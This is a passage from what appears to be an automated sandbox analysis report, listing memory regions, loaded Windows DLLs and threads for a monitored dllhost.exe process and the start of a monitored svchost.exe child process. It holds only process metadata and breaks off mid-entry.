"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1423 start_va = 0x3f80000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1424 start_va = 0x3f90000 end_va = 0x3f9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1425 start_va = 0x3fa0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1426 start_va = 0x3fb0000 end_va = 0x40affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 1427 start_va = 0x40b0000 end_va = 0x40bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1428 start_va = 0x40c0000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1429 start_va = 0x40d0000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1430 start_va = 0x40e0000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1431 start_va = 0x40f0000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1432 start_va = 0x4100000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1433 start_va = 0x4110000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1434 start_va = 0x4120000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1435 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1436 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1437 start_va = 0x4160000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1438 start_va = 0x4170000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1439 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1440 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1441 start_va = 0x41a0000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1442 start_va = 0x41b0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1443 start_va = 0x41c0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1444 start_va = 0x41d0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1445 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1446 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1447 start_va = 0x4200000 end_va = 0x420ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1448 start_va = 0x4210000 end_va = 0x421ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1449 start_va = 0x4220000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1450 start_va = 0x4230000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1451 start_va = 0x4240000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1452 start_va = 0x4250000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1453 start_va = 0x4260000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1454 start_va = 0x4270000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1455 start_va = 0x4280000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1456 start_va = 0x4290000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1457 start_va = 0x42a0000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1458 start_va = 0x42b0000 end_va = 0x42bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1459 start_va = 0x42c0000 end_va = 0x42cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1460 start_va = 0x42d0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1461 start_va = 0x42e0000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1462 start_va = 0x42f0000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1463 start_va = 0x4300000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1464 start_va = 0x4310000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1465 start_va = 0x4320000 end_va = 0x432ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1466 start_va = 0x4330000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1467 start_va = 0x4340000 end_va = 0x434ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1468 start_va = 0x4350000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1469 start_va = 0x4370000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1470 start_va = 0x4380000 end_va = 0x438ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1471 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1472 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1473 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1474 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1475 start_va = 0x7ff7f8d90000 end_va = 0x7ff7f8d96fff monitored = 0 entry_point = 0x7ff7f8d91570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 1476 start_va = 0x7ffb14670000 end_va = 0x7ffb14684fff monitored = 0 entry_point = 0x7ffb14675740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 1477 start_va = 0x7ffb18310000 end_va = 0x7ffb18608fff monitored = 0 entry_point = 0x7ffb183d7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1478 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1479 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1480 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1481 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1482 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1483 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1484 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1485 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1486 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1487 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1488 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1489 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1490 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1491 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1492 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1493 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1494 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1495 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1496 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1497 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1498 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1499 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1500 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1501 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1502 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1503 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1504 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1505 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1506 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 123 os_tid = 0xe8c Thread: id = 124 os_tid = 0x74c Thread: id = 125 os_tid = 0xd64 Thread: id = 126 os_tid = 0xadc Thread: id = 127 os_tid = 0x8a0 Thread: id = 128 os_tid = 0x898 Thread: id = 129 os_tid = 0x888 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x72a59000" os_pid = "0x57c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x750" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1509 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1510 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1511 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1512 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1513 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1514 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1515 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1516 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 